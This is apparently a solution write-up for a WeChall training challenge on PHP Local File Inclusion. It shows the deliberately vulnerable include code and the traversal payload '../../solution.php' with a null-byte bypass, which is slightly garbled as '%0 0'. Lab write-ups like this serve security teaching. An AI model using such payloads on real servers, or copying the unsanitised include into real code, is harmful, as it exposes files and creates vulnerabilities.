PHP - Local File Inclusion
Your mission is to exploit this code, which has obviously an LFI vulnerability:
--
GeSHi`ed PHP code
1 $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
2 include $filename;
--
There is a lot of important stuff in ../solution.php, so please include and execute this file for us.
Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums
For debugging purposes, you may look at the whole source again, also as highlighted version.
Solution:
- The page where you are browsing is:
https://www.wechall.net/challenge/training/php/lfi/up/index.php
- And the page when you send request will be shown up is:
https://www.wechall.net/challenge/training/php/lfi/up/pages/welcome.html
- So, the LFI vulnerability you should take advantage is like below:
index.php?file=../../solution.php
- But don't forget the script code will add the .html in the end. To bypass this restriction, we’ll use the null byte. Everything after the null byte will be deleted.
index.php?file=../../solution.php%0 0
- Use the URL above to send the rquest. It's done!